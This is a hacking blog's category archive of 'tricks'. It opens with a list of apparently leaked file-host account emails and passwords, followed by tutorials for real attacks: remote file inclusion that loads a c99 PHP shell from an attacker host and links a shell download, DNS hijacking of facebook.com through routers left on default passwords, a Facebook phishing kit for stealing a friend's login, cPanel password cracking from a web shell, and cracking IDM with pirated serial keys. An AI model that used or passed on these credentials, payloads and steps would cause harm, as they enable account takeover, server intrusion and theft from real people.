Category Archives: NEW TRICK
Premium Wupload 3/4/2012
esteban_benavides@yahoo.com – e9MDxhT3k
Pccatcher@gmx.ch – 9grTmiMQk
sbcaront@gmail.com – ej283350.-
samymoustafa@upcmail.nl – ihsane
jjbcsr@yahoo.com – railroad
Dazza.lfc@gmail.com – dazza417
qwdrert@web.de – 3382169
yavuzzayim@hotmail.com – 19801980
dorseysr@gmail.com – 123faith
mouse128@singnet.com.sg – mickyang
teslerd@gmail.com – loverman
hot88stang@yahoo.com – stangg
joachim-uwe.lang@t-online.de – jlang1
skyriders99@hotmail.com – putaria
presentsdupasse@numericable.fr – valere
steph2k1uk@hotmail.co.uk – 12345678
shun@fujiwara-ah.com – sujiskk
perry.cain@gmail.com – neoteric
Best PPC Advertising Networks | Pay Per Click
Tutorial On Port Scanning (Hacking Technique)
In my last post, I explained about Information Gathering technique and this tutorial is based on port scanning,.
- Well Known Ports (0 – 1023)
- Registered Ports (1024 – 49151)
- Dynamic and/or Private Ports (49152 – 65535)
| Default ports & their services | |
|---|---|
| Port | Service |
| 21 | FTP |
| 23 | Telnet |
| 25 | SMTP |
| 80 | HTTP |
| 110 | POP3 |
| 8080 | Proxy |
- Go to command prompt> Type netstat -n
- It will display all the active connections with ports (for e.g. in foreign address 74.125.236.24:80, 80 is the port number)
- Now type “tasklist” in command prompt, it will display all the processes with their process IDs (labelled PID).
- If you find any suspicious running process, then type “netstat -no” in command prompt and check the connection associated with that PID.
- At end, terminate the process using command “taskkill /PID 1786” where 1786 is the PID.
How To Hack Website By Remote File Inclusion

A Remote File Inclusion vulnerability is where we trick the web server in to putting our file (file uploader / php shell) in to the web page. It then parses our PHP script and we then have full control over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.
Normally, I’m against stuff like this. I believe people should find their own vulnerable sites. But, for the sake of this paper, i will show you how we can use google to get us
vulnerable sites.
We will query google like so:
Code:
inurl:”index.php?page=”
This query asks google to give us any page with index.php?page= in the url. If we look at it, we can see that ‘page’ is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter
http://www.google.com after the equal sign.
Code:
http://www.site.com/index.php?page=www.google.com
If the full google.com website appears on the page, the websiteis vulnerable. If not, keep
looking.
To exploit the vulnerability we must first look at the following example of a RFI:Code:
http://www.shittysite.com/index.php?page=www.evilsite.com/shell.txt?
A) Get a free host website (like dajoob or free webs)
B) Put a PHP shell (c99) in text form on the site
C) Insert the path to the shell in the vulnerable hosts url,
like the example above.
D) You can then proceed to deface the site etc.
download shell here :
Code:
http://0nzz.t35.com/c99ud.txt
How to Send free anonymous SMS from any number to any number

To send anonymous SMS , first you need to sign up on smsglobal.com. On registration, you will 25 free credit that can be used to send 25 SMS free of cost from one number to another in India or anywhere in the world.To send your first free anonymous message follow the below steps:
Crack IDM Manually (Specially For Windows 7 Users)
Mostly time after updating your IDM, it shows error “you have registered IDM using fake serial key”. In my old post, I posted to download IDM without any keygen, but it shows error while installing it in Windows 7 something like “Windows cannot find ‘crys18.exe’ make sure that u typed the name correctly”. Later I search on net how to crack IDM, then finally I found a solution. If you are windows 7 users, then this post is for you, because for XP/Vista users , users can easily access full version IDM by downloading it from here without any keygen & error, follow these steps:- Download the IDM, then click on Registration.
- A dialog box will appear asking for Name, Last Name, Email Address and Serial Key.
- Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:
RLDGN-OV9WU-5W589-6VZH1
HUDWE-UO689-6D27B-YM28M
UK3DV-E0MNW-MLQYX-GENA1
398ND-QNAGY-CMMZU-ZPI39
GZLJY-X50S3-0S20D-NFRF9
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
UVQW0-X54FE-QW35Q-SNZF5
FJJTJ-J0FLF-QCVBK-A287M - After clicking, it will show error message that you have registered IDM using fake serial key and IDM will exit.
- Now Go to the path C:\WINDOWS\system32\drivers\etc\hosts
- Open hosts file with notepad.
- Now copy the below lines of code and paste it to below 127.0.0.1 localhost
127.0.0.1 tonec.com
127.0.0.1 http://www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 http://www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 http://www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com - Save it.
- Now check IDM, it should be converted to full version.
DNS Hacking/Hijacking Tutorial

This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.
To start, you’ll need
• A computer running Linux (Ubuntu in my case)
• A basic understanding of how the Domain Name System (DNS) works.
Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.
Why DNS?
The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.
If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.
Malicious DNS Server
So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.
The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)
To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.
Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)
sudo gedit /etc/dnsmasq.conf
The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof
The format for this is address=/HOST/IP
So for example;
address=/facebook.com/63.63.63.63
where 63.63.63.63 is the IP of your malicious web server
Save the file and restart dnsmasq by running
sudo /etc/init.d/dnsmasq restart
You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63
Malicious Web Server
You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.
There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site
I’ll presume you know how to do that though
Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.
I Can Be Your DNS Server Plz?
An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that
But how do you get a victim? Well this is where my project, the IP Experiment could come in handy
If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.
Tutorial by doc
Learn How to Hack Facebook Password
Hacking Facebook Account Password: Facebook Phishing for Hacking Facebook
Facebook has evolved into one of the hottest social networking website in the world. Here is a simple tutorial that you can use to hack your friend’s facebook password. Here i’m writting on hacking Facebbok password using Facebook Phisher.
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.[Read more about phishing on Wikipedia]

Please Note: Phishing is legally offensive. I am not responsible for any action done by you.
Hacking Facebook password:
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.
1. First of all download Facebook Phisher
2. The downloaded file contains:
- Index.html
- write.php
3. Upload both files to any of these free webhost sites:
See Best Free Webhosting websites
4. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.
5. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in “passes.txt”. This file is created in your webhost control panel as shown.

If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.
6. Now, open passes.txt to get hacked Facebook id and password as shown.

Hope this tutorial was useful for you.
Don’t Forget to Leave a Comment 🙂
Cpanel Hacking/Cracking Tutorial
Today we will Learn CPANEL cracking or Hacking i.e gaining password for port no 2082 on website first of all we need a cpanel cracking shell on the server because we are going to crack those websites cpanels which are hosted on the shelled server.

so
in first step :- grab the usernames of the websites using command ls /var/mail or use the "Grab the usernames from /etc/passwd" option in the shell

press the go button we have done from our side lets wait and watch ,if we have supplied good passwords then shell will show a message " [~]# cracking success with username "xyz" with password "xyz" " otherwise it will show "[~] Please put some good passwords to crack username "xyz" :( "
so chances of success depends on password list that we are using in cracking process

Credits To z3r0 c00l and Team Indishell
